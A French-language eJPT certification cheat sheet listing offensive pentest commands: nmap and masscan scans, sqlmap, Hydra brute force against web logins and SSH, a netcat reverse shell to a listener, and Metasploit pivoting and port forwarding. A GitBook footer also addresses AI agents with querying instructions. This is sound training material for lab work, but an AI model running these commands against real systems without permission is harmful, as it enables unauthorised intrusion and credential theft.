> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/useful-resources/certifications/ejpt-certification-practical-guide.md).

# Guide pratique de certification eJPT

{% hint style="danger" %}
Le **eJPT (eLearnSecurity Junior Penetration Tester)** est une certification d’entrée dans le pentesting proposée par eLearnSecurity. Elle valide des compétences fondamentales en tests d’intrusion, notamment la reconnaissance des vulnérabilités, l’exploitation et le post-exploitation. L’examen est **pratique** et consiste à compromettre un environnement simulé, ce qui le rend idéal pour les débutants souhaitant démontrer leurs compétences en cybersécurité offensive.
{% endhint %}

{% embed url="<https://security.ine.com/certifications/ejpt-certification/>" %}

## Reconnaissance

### **Analyse du réseau**

Analyse des équipements sur un réseau :

```bash
nmap -sn 10.10.10.10/24
arp-scan -l
masscan 10.10.10.10/24 -p1-65535 --rate=10000
```

Analyse des ports ouverts sur un équipement spécifique :

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10
rustscan -a 10.10.10.10 --ulimit 5000
```

{% endcode %}

Analyse des ports ouverts sur plusieurs appareils :

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10,20,30,36 -oG allPorts
```

{% endcode %}

Extraction des ports ouverts :

{% code overflow="wrap" %}

```bash
grep '[0-9]' allPorts | cut -d '/' -f1 | sort -u | xargs | tr ' '  ','
```

{% endcode %}

* Exemple de sortie : `22,80,135,445,9543,2214`

Analyse détaillée des versions des services détectés :

```bash
nmap --open -sCV -p 22,80,135,445,9543,2214 10.10.10.10,20,30,36 -oN targeted
```

**Balayage ping sur un réseau Linux**

```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
```

### **Analyse des vulnérabilités**

Analyse des vulnérabilités web avec Nikto :

```bash
nikto -url http://website.com
```

Détection des vulnérabilités SQL avec SQLmap :

```bash
sqlmap -r request --dbs
```

Recherche de vulnérabilités SMB :

```bash
nmap -p445 --script"smb-vuln-*" 10.10.10.10
enum4linux -a 10.10.10.10
crackmapexec smb 10.10.10.10 --shares
```

## Exploitation

#### **Attaque par force brute avec Hydra**

**Panneau de connexion :**

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/admin.php:username=^USER^&password=^PASS^:Incorrect" -t 64 -F
```

{% endcode %}

**Force brute SSH avec Hydra :**

```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
```

## Metasploit – Pivotement et post-exploitation

### Shell inversé Metasploit

**Utilisation de Metasploit pour obtenir l'accès**

```bash
msfconsole
```

Configuration de l'écouteur :

```bash
use multi/handler
set LHOST 10.10.10.10
set LPORT 443
run
```

Envoi d'un shell inversé avec Netcat :

```bash
nc 10.10.10.10 443 -e /bin/bash
```

Passage de la session en arrière-plan :

```bash
sessions
```

### De Metasploit à Meterpreter

**Méthode 1 - Conversion d'un shell en Meterpreter**

Chargement du module de conversion :

```bash
use shell_to_meterpreter
```

Configuration de la session et du port :

```bash
set LHOST 10.10.10.10
set lport 443
set session 1
```

Interaction avec la session Meterpreter :

```bash
sessions -i 2
```

Ajout d'une route pour accéder à un autre segment de réseau :

```bash
route add 192.168.100.0/24 2
```

**Méthode 2 - Utilisation d’Autoroute**

* Chargez le `autoroute` module :

```bash
use multi/manage/autoroute
```

Configuration de la session et exécution :

```bash
set session 2
run
```

**Analyse du réseau depuis Metasploit**

* Analyse des ports d'une machine pivotée :

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.100.21
run
```

### **Redirection de ports avec Metasploit**

* Ajout d'une redirection de port pour accéder à un service distant :

```bash
sessions -i 2
portfwd add -l 8080 -p 80 -r 192.168.100.21
```

Liste des règles de redirection :

```bash
portfwd
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/useful-resources/certifications/ejpt-certification-practical-guide.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
